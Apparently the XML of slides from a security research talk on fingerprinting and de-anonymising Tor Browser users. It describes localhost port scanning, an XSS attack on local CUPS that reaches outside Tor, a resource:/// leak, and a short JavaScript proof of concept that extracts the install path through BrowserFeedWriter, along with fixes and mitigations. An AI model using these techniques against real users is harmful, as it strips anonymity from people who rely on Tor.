              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t> Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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1590975"/>
            <a:ext cx="268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Windows 8.1</a:t>
            </a:r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16" dur="23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5)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="19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.8)">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1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.5)">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="4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Proof of Concept Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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556792"/>
            <a:ext cx="2731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/>
              <a:t>Gentoo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t> Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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1590975"/>
            <a:ext cx="268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Windows 8.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="3600" b="1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32856"/>
            <a:ext cx="4608511" cy="41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355976" cy="357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inux_netstat1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect l="294" t="6588" r="40416" b="65355"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3873015" y="2996952"/>
            <a:ext cx="5270985" cy="1728192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="netstat_win8.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect t="1096" r="12477"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="2490948"/>
            <a:ext cx="4804773" cy="288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52"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1194696" y="1484784"/>
            <a:ext cx="6744347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Tor Browser Bundle</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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052736"/>
            <a:ext cx="2475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Tor Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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556792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Based on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> ESR.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Default settings changed for enhanced privacy.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Adds extensions for Tor use and added privacy.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Bundled with Tor client.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Makes Tor use simple (no setup or understanding needed).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Current version is 3.5.1 and used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> ESR 24.4.0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Issues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364575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Issues</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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868631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Slow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Memory leak in Linux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Restarts on reload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User may change ports/services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3474874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Solutions</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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010288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Only scan interesting ports (common applications)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Periodically save progress.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Save </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>lastport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> on unload and/or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>beforeunload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> events.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Limit number of ports scanned per page load on Linux.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Partial match rather than matching hash.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Fingerprint analysis after the fact.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Platform Comparison</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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512" y="2090018"/>
          <a:ext cx="8784972" cy="34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996"/>
                <a:gridCol w="1254996"/>
                <a:gridCol w="1254996"/>
                <a:gridCol w="1254996"/>
                <a:gridCol w="1254996"/>
                <a:gridCol w="1254996"/>
                <a:gridCol w="1254996"/>
              </a:tblGrid>
              <a:tr h="909986"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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> 8.1</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Laptop</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA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 8.0</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Surface Pro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Gentoo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Linux</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Laptop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Kali Linux</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>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 7</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Office</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Desktop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Windows XP</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>NCB-105</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="63699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Restricted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Same</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" sz="1050" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="5896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Open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Type 2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1025, 1026, 1027, 1028, 1029, 1030,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> 1049, 2103, 2105, 2107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50" dirty="0" smtClean="0"/>
                        <a:t>902, 912, 5800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445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445</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" sz="1050" dirty="0"/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Open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3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA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445, 1801, 5357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50" dirty="0" smtClean="0"/>
                        <a:t>445, 2002, 5357, 5900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50" dirty="0" smtClean="0"/>
                        <a:t>445, 623, 902, 912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50" dirty="0" smtClean="0"/>
                        <a:t>1059, 3389, 3580, 5151, 5152, 5354</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" sz="1050" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="63193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HTTP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA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5357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912,  5357,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> 5800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80, 433, 631,3306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50" dirty="0" smtClean="0"/>
                        <a:t>623, 912</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA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None</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" sz="105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91880" y="1196752"/>
            <a:ext cx="306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Ports 1 to 6000</a:t>
            </a:r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err="1" smtClean="0"/>
              <a:t>BrowserFeedWriter</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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196752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Firefox Bug 983845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CA" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>BrowserFeedWriter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0"/>
              <a:t>() exposed to web.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CA" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Firefox-specific internal interface.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Tor Ticket 9308, 5922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CA" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>BrowserFeedWriter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0"/>
              <a:t> exceptions may leak Tor Browser install path.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Fixed in development version but not current or beta.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 Only affects Windows and OSX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1844824"/>
            <a:ext cx="7632848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>
            <a:outerShdw blurRad="1524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var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path = null;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try {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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BrowserFeedWriter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()).close();</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1400" b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}catch(e) {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var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start =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e.message.indexOf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("file:///");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var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end =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e.message.indexOf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("/Browser");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if(start &gt; 0 &amp;&amp; end &gt; 0) {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        path = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>e.message.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(start+8, end);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        }</a:t>
            </a:r>
          </a:p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       }</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1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4797152"/>
            <a:ext cx="7632848" cy="892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>
            <a:outerShdw blurRad="152400" dist="203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CA" sz="1400" dirty="0" smtClean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CA" sz="2400" dirty="0" smtClean="0"/>
              <a:t>C:/Users/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>dservos5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0"/>
              <a:t>/Desktop/Tor Browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="1400" dirty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Fingerprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="linux_brows_edited.mp40026-464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5799" y="980728"/>
            <a:ext cx="6562954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8)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="12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4)">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="120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0)">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="94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8)">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="6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98)">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="5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8)">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="4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18)">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="3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20)">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="34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30)">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="24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6443663" cy="935038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Identification</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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500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Find XSS exploit in common http based service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> CUPS).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Send XSS request to cups http administration site over 127.0.0.1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0"/>
              <a:t>631.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XSS makes request to your server outside of Tor with UID.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Link traffic with same UID over your exit node to IP UID was sent with.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96752"/>
            <a:ext cx="408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XSS in Local Services</a:t>
            </a:r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Exploit Status</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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196752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127.0.0.1 Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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4056" y="177281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Fixed in Tor Browser 5.3.2 in mid February.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5.3.1 and down vulnerable.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Stops port scanning and possible identification via XSS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3068960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b="1" dirty="0" smtClean="0"/>
              <a:t>resource:/// Leak</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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3645024"/>
            <a:ext cx="853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All versions still vulnerable.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No fix yet committed yet.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Updated ticket #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0"/>
              <a:t>8725 with my results and suggested temp fix.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Waiting on upstream (since 2009).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5230941"/>
            <a:ext cx="203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b="1" dirty="0" smtClean="0"/>
              <a:t>Path Leak</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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5733256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All versions still vulnerable.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Fix committed for future release + upstream fix to be pulled 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Mitigation</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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196752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127.0.0.1 Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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4056" y="1772816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Update to newest version (&gt;3.5.1).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Ensure no exception to proxy rules.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278092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b="1" dirty="0" smtClean="0"/>
              <a:t>resource:/// Leak</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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356992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/>
              <a:t>Temp Fix: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Add “#” comments to top of all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> files.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/>
              <a:t>Long Term Fix: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Remove website access to resource:///.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/>
              <a:t>End User Fix: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Run Tor in VM, only use current version and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>enUS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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79512" y="4581128"/>
            <a:ext cx="203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b="1" dirty="0" smtClean="0"/>
              <a:t>Path Leak</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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501317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Use upstream patch/pull in new version of upstream.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b="1" dirty="0" smtClean="0"/>
              <a:t>End User Fix: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Run Tor in VM, only use Linux Tor, put Tor on path with out user name.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Mitigation</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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980728"/>
            <a:ext cx="36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General End User</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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4056" y="1556792"/>
            <a:ext cx="8532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Use VM or Live CD that only allows networking via Tor.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Don’t install extensions or customize settings.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Always use current version, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>enUS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> if possible.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Always check security indicators.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Understand security certificates and their warnings.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Disable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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3861048"/>
            <a:ext cx="215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Developer</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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365104"/>
            <a:ext cx="8532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Disable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> by default (possible fingerprint?)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Move away from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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Disable extensions.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Extension permissions/access control.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Turn on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>NoScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> XSS/ABE protections.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Add certificate pining and/or check multiple certificates.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800" dirty="0" smtClean="0"/>
              <a:t>Conclusions &amp; Future Work</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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412776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Current Tor Browser versions vulnerable to fingerprinting and possible identification.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Tor versions 3.5.1 and down, vulnerable to port/service fingerprinting and possible identification via XSS to local service.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Third party cookies still possible.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Eavesdropping with HTTPS avoidance easy using off-the-self software.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End users need to change browsing and browser use habits (no extensions, use Live CD/VM, no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>?).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08720"/>
            <a:ext cx="2460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 smtClean="0"/>
              <a:t>Conclusions</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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5469031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Port fingerprinting could be interesting to explore outside of Tor.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Apply machine learning to port response times.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Fingerprinting using other response times?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42909"/>
            <a:ext cx="2581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b="1" dirty="0" smtClean="0"/>
              <a:t>Future Work</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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Attack Model</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="48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107504" y="4581128"/>
            <a:ext cx="1450861" cy="1643410"/>
            <a:chOff x="467544" y="3327375"/>
            <a:chExt cx="1450861" cy="1643410"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5" descr="desktop-computer-12027669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197"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="467544" y="3327375"/>
              <a:ext cx="1450861" cy="129614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7584" y="4509120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Alice</a:t>
              </a:r>
              <a:endParaRPr lang="en-CA" sz="2400" b="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063880" y="2852936"/>
            <a:ext cx="1080120" cy="1685801"/>
            <a:chOff x="7524328" y="3327375"/>
            <a:chExt cx="1080120" cy="1685801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8" descr="Server-multip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4328" y="3327375"/>
              <a:ext cx="1080120" cy="15272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700415" y="4551511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Bob</a:t>
              </a:r>
              <a:endParaRPr lang="en-CA" sz="2400" b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355976" y="2564904"/>
            <a:ext cx="62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Eve</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="Group 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="127597" y="1052736"/>
            <a:ext cx="1564083" cy="1932022"/>
            <a:chOff x="361011" y="1484784"/>
            <a:chExt cx="1564083" cy="1932022"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48" name="Picture 47" descr="Server-multip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60" y="1484784"/>
              <a:ext cx="1080120" cy="152726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61011" y="2708920"/>
              <a:ext cx="15640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Tor Directory</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
                <a:t>Server</a:t>
              </a:r>
              <a:endParaRPr lang="en-CA" sz="2000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Left-Right Arrow 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="107504" y="3429000"/>
            <a:ext cx="1512168" cy="504056"/>
          </a:xfrm>
          <a:prstGeom prst="left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Rectangle 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7164288" y="5081702"/>
            <a:ext cx="288032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Rectangle 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7164288" y="5441742"/>
            <a:ext cx="288032" cy="2880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TextBox 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7452320" y="5000402"/>
            <a:ext cx="114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Encrypted</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D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52320" y="5432450"/>
            <a:ext cx="146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Unencrypted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1520" y="34290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TLS</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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" name="Picture 60" descr="id-47557-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1196752"/>
            <a:ext cx="432048" cy="432048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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="108" name="Group 107"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2699792" y="3341000"/>
            <a:ext cx="4053015" cy="1600168"/>
            <a:chOff x="2699792" y="3773048"/>
            <a:chExt cx="4053015" cy="1600168"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="80" name="Group 79"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4139952" y="3773048"/>
              <a:ext cx="1172695" cy="592056"/>
              <a:chOff x="3635896" y="5949280"/>
              <a:chExt cx="1172695" cy="592056"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="81" name="Picture 80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82" name="Picture 81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83" name="Group 82"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5580112" y="3773048"/>
              <a:ext cx="1172695" cy="592056"/>
              <a:chOff x="3707904" y="5949280"/>
              <a:chExt cx="1172695" cy="592056"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="84" name="Picture 83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07904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85" name="Picture 84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49648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2699792" y="4781160"/>
              <a:ext cx="1172695" cy="592056"/>
              <a:chOff x="3635896" y="5949280"/>
              <a:chExt cx="1172695" cy="592056"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="87" name="Picture 86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88" name="Picture 87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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="107" name="Group 106"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2699792" y="1484784"/>
            <a:ext cx="4073582" cy="4392488"/>
            <a:chOff x="2699792" y="1916832"/>
            <a:chExt cx="4073582" cy="4392488"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="60" name="Group 59"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2720359" y="1916832"/>
              <a:ext cx="1172695" cy="592056"/>
              <a:chOff x="3635896" y="5949280"/>
              <a:chExt cx="1172695" cy="592056"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="58" name="Picture 57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59" name="Picture 58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4160519" y="1916832"/>
              <a:ext cx="1172695" cy="592056"/>
              <a:chOff x="3635896" y="5949280"/>
              <a:chExt cx="1172695" cy="592056"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="63" name="Picture 62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64" name="Picture 63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5600679" y="1916832"/>
              <a:ext cx="1172695" cy="592056"/>
              <a:chOff x="3707904" y="5949280"/>
              <a:chExt cx="1172695" cy="592056"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="66" name="Picture 65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07904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67" name="Picture 66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49648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2699792" y="2764936"/>
              <a:ext cx="1172695" cy="592056"/>
              <a:chOff x="3635896" y="5949280"/>
              <a:chExt cx="1172695" cy="592056"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="69" name="Picture 68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70" name="Picture 69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4139952" y="2764936"/>
              <a:ext cx="1172695" cy="592056"/>
              <a:chOff x="3635896" y="5949280"/>
              <a:chExt cx="1172695" cy="592056"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="72" name="Picture 71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73" name="Picture 72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74" name="Group 73"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5580112" y="2764936"/>
              <a:ext cx="1172695" cy="592056"/>
              <a:chOff x="3707904" y="5949280"/>
              <a:chExt cx="1172695" cy="592056"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="75" name="Picture 74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07904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76" name="Picture 75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49648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77" name="Group 76"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2699792" y="3773048"/>
              <a:ext cx="1172695" cy="592056"/>
              <a:chOff x="3635896" y="5949280"/>
              <a:chExt cx="1172695" cy="592056"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="78" name="Picture 77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79" name="Picture 78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89" name="Group 88"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4139952" y="4781160"/>
              <a:ext cx="1172695" cy="592056"/>
              <a:chOff x="3635896" y="5949280"/>
              <a:chExt cx="1172695" cy="592056"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="90" name="Picture 89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35896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91" name="Picture 90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77640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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="92" name="Group 91"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5580112" y="4781160"/>
              <a:ext cx="1172695" cy="592056"/>
              <a:chOff x="3707904" y="5949280"/>
              <a:chExt cx="1172695" cy="592056"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="93" name="Picture 92" descr="server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07904" y="5949280"/>
                <a:ext cx="1172695" cy="592056"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="94" name="Picture 93" descr="id-47557-logo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49648" y="5961888"/>
                <a:ext cx="432048" cy="432048"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:scene3d>
                <a:camera prst="perspectiveRelaxed"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="99" name="Picture 98" descr="serv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9792" y="5717264"/>
              <a:ext cx="1172695" cy="592056"/>
            </a:xfrm>
